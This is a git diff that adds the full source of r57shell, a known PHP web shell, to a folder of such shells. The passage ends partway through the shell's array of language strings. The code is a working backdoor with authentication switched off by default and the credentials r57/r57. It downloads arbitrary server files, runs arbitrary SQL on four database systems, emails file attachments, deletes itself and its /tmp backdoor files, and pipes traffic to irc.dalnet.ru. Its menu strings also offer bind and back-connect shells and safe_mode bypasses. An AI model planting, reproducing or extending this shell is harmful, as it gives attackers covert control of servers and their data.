+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> |ترجم إلى اللغة العربية بواسطة مستعمر version ".$version." ]---o</b></font></div></td></tr></table>".$f;
+?>
+
diff --git a/php/PHPshell/r57shell127/r57shell127.jpg b/php/PHPshell/r57shell127/r57shell127.jpg
new file mode 100644
index 0000000..8ba76d5
Binary files /dev/null and b/php/PHPshell/r57shell127/r57shell127.jpg differ
diff --git a/php/PHPshell/r57shell127/r57shell127.php b/php/PHPshell/r57shell127/r57shell127.php
new file mode 100644
index 0000000..2e685f7
--- /dev/null
+++ b/php/PHPshell/r57shell127/r57shell127.php
@@ -0,0 +1,2287 @@ +<?phpr57shell.php - ٌêًèïٍ يà ïُï ïîçâîëے‏ùèé âàى âûïîëيےٍü ّهëë êîىàينû يà ٌهًâهًه ÷هًهç لًàَçهً +/* آû ىîوهٍه ٌêà÷àٍü يîâَ‏ âهًٌè‏ يà يàّهى ٌàéٍه: http://rst.void.ru +/* آهًٌèے: 1.24 (New Year Edition) +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* خٍنهëüيàے لëàمîنàًيîٌٍü çà ïîىîùü è èنهè: blf, virus, NorD è âٌهى ÷هًٍےى èç RST/GHC. +/******************************************************************************************************/ +/* ~~~ حàًٌٍîéêè | Options ~~~ */ + +// آûلîً ےçûêà | Language +// $language='ru' - ًٌٌَêèé (russian) +// $language='eng' - english (àيمëèéٌêèé) +$language='ru'; + +// ہٍَهيٍèôèêàِèے | Authentification +// $auth = 1; - ہٍَهيٍèôèêàِèے âêë‏÷هيà ( authentification = On ) +// $auth = 0; - ہٍَهيٍèôèêàِèے âûêë‏÷هيà ( authentification = Off ) +$auth = 0; + +// ثîمèي è ïàًîëü نëے نîٌٍَïà ê ٌêًèïٍَ (Login & Password for access) +// حإ اہءسؤـزإ رجإحبزـ دإذإؤ ذہاجإظإحبإج حہ رإذآإذإ!!! (CHANGE THIS!!!) 
+$name='r57'; // ëîمèي ïîëüçîâàٍهëے (user login) +$pass='r57'; // ïàًîëü ïîëüçîâàٍهëے (user password) +/******************************************************************************************************/ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.24"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); + } +} +$head = '<!-- انًàâٌٍâَé آàٌے --> +<html> +<head> +<title>r57shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: 
#eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT: #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT: #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT: buttonhighlight 2px outset;
+BORDER-TOP: buttonhighlight 2px outset;
+BORDER-LEFT: buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT: #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT: #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+class zipfile
+{
+ var $datasec = array();
+ var $ctrl_dir = array();
+ var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+ var $old_offset = 0;
+ function unix2DosTime($unixtime = 0) {
+ $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+ if ($timearray['year'] < 1980) {
+ $timearray['year'] = 1980;
+ $timearray['mon'] = 1;
+ $timearray['mday'] = 1;
+ $timearray['hours'] = 0;
+ $timearray['minutes'] = 0;
+ $timearray['seconds'] = 0;
+ }
+ return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+ ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+ }
+ function addFile($data, $name, $time = 0)
+ {
+ $name = str_replace('\\', '/', $name);
+ $dtime = dechex($this->unix2DosTime($time));
+ $hexdtime = '\x' . 
$dtime[6] . $dtime[7]
+ . '\x' . $dtime[4] . $dtime[5]
+ . '\x' . $dtime[2] . $dtime[3]
+ . '\x' . $dtime[0] . $dtime[1];
+ eval('$hexdtime = "' . $hexdtime . '";');
+ $fr = "\x50\x4b\x03\x04";
+ $fr .= "\x14\x00";
+ $fr .= "\x00\x00";
+ $fr .= "\x08\x00";
+ $fr .= $hexdtime;
+ $unc_len = strlen($data);
+ $crc = crc32($data);
+ $zdata = gzcompress($data);
+ $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+ $c_len = strlen($zdata);
+ $fr .= pack('V', $crc);
+ $fr .= pack('V', $c_len);
+ $fr .= pack('V', $unc_len);
+ $fr .= pack('v', strlen($name));
+ $fr .= pack('v', 0);
+ $fr .= $name;
+ $fr .= $zdata;
+ $this -> datasec[] = $fr;
+ $cdrec = "\x50\x4b\x01\x02";
+ $cdrec .= "\x00\x00";
+ $cdrec .= "\x14\x00";
+ $cdrec .= "\x00\x00";
+ $cdrec .= "\x08\x00";
+ $cdrec .= $hexdtime;
+ $cdrec .= pack('V', $crc);
+ $cdrec .= pack('V', $c_len);
+ $cdrec .= pack('V', $unc_len);
+ $cdrec .= pack('v', strlen($name) );
+ $cdrec .= pack('v', 0 );
+ $cdrec .= pack('v', 0 );
+ $cdrec .= pack('v', 0 );
+ $cdrec .= pack('v', 0 );
+ $cdrec .= pack('V', 32 );
+ $cdrec .= pack('V', $this -> old_offset );
+ $this -> old_offset += strlen($fr);
+ $cdrec .= $name;
+ $this -> ctrl_dir[] = $cdrec;
+ }
+ function file()
+ {
+ $data = implode('', $this -> datasec);
+ $ctrldir = implode('', $this -> ctrl_dir);
+ return
+ $data .
+ $ctrldir .
+ $this -> eof_ctrl_dir .
+ pack('v', sizeof($this -> ctrl_dir)) .
+ pack('v', sizeof($this -> ctrl_dir)) .
+ pack('V', strlen($ctrldir)) .
+ pack('V', strlen($data)) . 
+ "\x00\x00";
+ }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+ global $content_encoding;
+ global $mime_type;
+ if ($compress == 'bzip' && @function_exists('bzcompress'))
+ {
+ $filename .= '.bz2';
+ $mime_type = 'application/x-bzip2';
+ $filedump = bzcompress($filedump);
+ }
+ else if ($compress == 'gzip' && @function_exists('gzencode'))
+ {
+ $filename .= '.gz';
+ $content_encoding = 'x-gzip';
+ $mime_type = 'application/x-gzip';
+ $filedump = gzencode($filedump);
+ }
+ else if ($compress == 'zip' && @function_exists('gzcompress'))
+ {
+ $filename .= '.zip';
+ $mime_type = 'application/zip';
+ $zipfile = new zipfile();
+ $zipfile -> addFile($filedump, substr($filename, 0, -4));
+ $filedump = $zipfile -> file();
+ }
+ else
+ {
+ $mime_type = 'application/octet-stream';
+ }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+if(isset($_GET['img'])&&!empty($_GET['img']))
+ {
+ $images = array();
+ $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
+ $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
+ @ob_clean();
+ header("Content-type: image/gif");
+ echo base64_decode($images[$_GET['img']]);
+ die();
+ }
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+ if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
+ else
+ {
+ @ob_clean();
+ $filename = @basename($_POST['d_name']);
+ $filedump = @fread($file,@filesize($_POST['d_name']));
+ fclose($file);
+ $content_encoding=$mime_type='';
+ 
compress($filename,$filedump,$_POST['compress']);
+ if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+ header("Content-type: ".$mime_type);
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+ }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+ echo $head;
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+ {
+ if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+ $querys = @explode(';',$_POST['db_query']);
+ foreach($querys as $num=>$query)
+ {
+ if(strlen($query)>5){
+ echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+ $res = @mysql_query($query,$db);
+ $error = @mysql_error($db);
+ if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+ else {
+ if (@mysql_num_rows($res) > 0)
+ {
+ $sql2 = $sql = $keys = $values = '';
+ while (($row = @mysql_fetch_assoc($res)))
+ {
+ $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+ $values = @array_values($row);
+ foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+ $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+ $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+ }
+ echo "<table width=100%>";
+ $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+ $sql .= $sql2;
+ echo $sql;
+ echo "</table><br>";
+ }
+ else { if(($rows = 
@mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div 
align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], 
$_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo 
"</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} 
+if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'آûïîëيهييàے êîىàينà', +'ru_text2' =>'آûïîëيهيèه êîىàين يà ٌهًâهًه', +'ru_text3' =>'آûïîëيèٍü êîىàينَ', +'ru_text4' =>'ذàلî÷àے نèًهêٍîًèے', +'ru_text5' =>'اàمًَçêà ôàéëîâ يà ٌهًâهً', +'ru_text6' =>'ثîêàëüيûé ôàéë', +'ru_text7' =>'ہëèàٌû', 
+'ru_text8' =>'آûلهًèٍه àëèàٌ', +'ru_butt1' =>'آûïîëيèٍü', +'ru_butt2' =>'اàمًَçèٍü', +'ru_text9' =>'خٍêًûٍèه ïîًٍà è ïًèâےçêà همî ê /bin/bash', +'ru_text10'=>'خٍêًûٍü ïîًٍ', +'ru_text11'=>'دàًîëü نëے نîٌٍَïà', +'ru_butt3' =>'خٍêًûٍü', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-àنًهٌ', +'ru_text14'=>'دîًٍ', +'ru_butt4' =>'آûïîëيèٍü', +'ru_text15'=>'اàمًَçêà ôàéëîâ ٌ َنàëهييîمî ٌهًâهًà', +'ru_text16'=>'بٌïîëüçîâàٍü', +'ru_text17'=>'سنàëهييûé ôàéë', +'ru_text18'=>'ثîêàëüيûé ôàéë', +'ru_text19'=>'Exploits', +'ru_text20'=>'بٌïîëüçîâàٍü', +'ru_text21'=>'حîâîه èىے', +'ru_text22'=>'datapipe', +'ru_text23'=>'ثîêàëüيûé ïîًٍ', +'ru_text24'=>'سنàëهييûé ُîٌٍ', +'ru_text25'=>'سنàëهييûé ïîًٍ', +'ru_text26'=>'بٌïîëüçîâàٍü', +'ru_butt5' =>'اàïٌٍَèٍü', +'ru_text28'=>'ذàلîٍà â safe_mode', +'ru_text29'=>'ؤîٌٍَï çàïًهùهي', +'ru_butt6' =>'رىهيèٍü', +'ru_text30'=>'دًîٌىîًٍ ôàéëà', +'ru_butt7' =>'آûâهٌٍè', +'ru_text31'=>'شàéë يه يàéنهي', +'ru_text32'=>'آûïîëيهيèه PHP êîنà', +'ru_text33'=>'دًîâهًêà âîçىîويîٌٍè îلُîنà îمًàيè÷هيèé open_basedir ÷هًهç ôَيêِèè cURL', +'ru_butt8' =>'دًîâهًèٍü', +'ru_text34'=>'دًîâهًêà âîçىîويîٌٍè îلُîنà îمًàيè÷هيèé safe_mode ÷هًهç ôَيêِè‏ include', +'ru_text35'=>'دًîâهًêà âîçىîويîٌٍè îلُîنà îمًàيè÷هيèé safe_mode ÷هًهç çàمًَçêَ ôàéëà â mysql', +'ru_text36'=>'ءàçà', +'ru_text37'=>'ثîمèي', +'ru_text38'=>'دàًîëü', +'ru_text39'=>'زàلëèِà', +'ru_text40'=>'ؤàىï ٍàلëèِû لàçû نàييûُ', +'ru_butt9' =>'ؤàىï', +'ru_text41'=>'رîًُàيèٍü â ôàéëه', +'ru_text42'=>'ذهنàêٍèًîâàيèه ôàéëà', +'ru_text43'=>'ذهنàêٍèًîâàٍü ôàéë', +'ru_butt10'=>'رîًُàيèٍü', +'ru_butt11'=>'ذهنàêٍèًîâàٍü', +'ru_text44'=>'ذهنàêٍèًîâàيèه ôàéëà يهâîçىîويî! 
ؤîٌٍَï ٍîëüêî نëے ÷ٍهيèے!', +'ru_text45'=>'شàéë ٌîًُàيهي', +'ru_text46'=>'دًîٌىîًٍ phpinfo()', +'ru_text47'=>'دًîٌىîًٍ يàًٌٍîهê php.ini', +'ru_text48'=>'سنàëهيèه âًهىهييûُ ôàéëîâ', +'ru_text49'=>'سنàëهيèه ٌêًèïٍà ٌ ٌهًâهًà', +'ru_text50'=>'بيôîًىàِèے î ïًîِهٌٌîًه', +'ru_text51'=>'بيôîًىàِèے î ïàىےٍè', +'ru_text52'=>'زهêٌٍ نëے ïîèٌêà', +'ru_text53'=>'بٌêàٍü â ïàïêه', +'ru_text54'=>'دîèٌê ٍهêٌٍà â ôàéëàُ', +'ru_butt12'=>'حàéٍè', +'ru_text55'=>'زîëüêî â ôàéëàُ', +'ru_text56'=>'حè÷همî يه يàéنهيî', +'ru_text57'=>'رîçنàٍü/سنàëèٍü شàéë/ؤèًهêٍîًè‏', +'ru_text58'=>'بىے', +'ru_text59'=>'شàéë', +'ru_text60'=>'ؤèًهêٍîًè‏', +'ru_butt13'=>'رîçنàٍü/سنàëèٍü', +'ru_text61'=>'شàéë ٌîçنàي', +'ru_text62'=>'ؤèًهêٍîًèے ٌîçنàيà', +'ru_text63'=>'شàéë َنàëهي', +'ru_text64'=>'ؤèًهêٍîًèے َنàëهيà', +'ru_text65'=>'رîçنàٍü', +'ru_text66'=>'سنàëèٍü', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'تîىàينà', +'ru_text69'=>'دàًàىهًٍ1', +'ru_text70'=>'دàًàىهًٍ2', +'ru_text71'=>"آٍîًîé ïàًàىهًٍ êîىàينû:\r\n- نëے CHOWN - èىے يîâîمî ïîëüçîâàٍهëے èëè همî UID (÷èٌëîى) \r\n- نëے êîىàينû CHGRP - èىے مًَïïû èëè GID (÷èٌëîى) \r\n- نëے êîىàينû CHMOD - ِهëîه ÷èٌëî â âîٌüىهًè÷يîى ïًهنٌٍàâëهيèè (يàïًèىهً 0777)", +'ru_text72'=>'زهêٌٍ نëے ïîèٌêà', +'ru_text73'=>'بٌêàٍü â ïàïêه', +'ru_text74'=>'بٌêàٍü â ôàéëàُ', +'ru_text75'=>'* ىîويî èٌïîëüçîâàٍü ًهمَëےًيîه âûًàوهيèه', +'ru_text76'=>'دîèٌê ٍهêٌٍà â 